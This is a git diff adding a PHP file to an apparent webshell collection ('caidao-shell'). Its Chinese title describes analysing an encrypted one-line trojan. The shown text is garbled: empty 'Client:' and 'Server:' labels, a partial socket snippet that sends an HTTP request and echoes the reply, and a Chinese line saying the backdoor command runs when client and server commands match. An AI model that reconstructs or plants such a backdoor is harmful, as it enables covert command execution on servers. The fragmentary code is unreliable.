diff --git a/caidao-shell/toby57解析加密一句话木马.php b/caidao-shell/toby57解析加密一句话木马.php new file mode 100644 index 0000000..6aef0cd --- /dev/null +++ b/caidao-shell/toby57解析加密一句话木马.php @@ -0,0 +1,30 @@ +Client: + + +Server: + +\r\n"; +$out .= "Connection: close\r\n\r\n"; +fwrite($fp,$out); +while(!feof($fp)){ +$resp_str=""; +$resp_str .= fgets($fp,512);//返回值放入$resp_str +} +fclose($fp); +echo($resp_str);//处理返回值. +?> +对服务端与客户端指令对比,如一致则执行后门指令。 \ No newline at end of file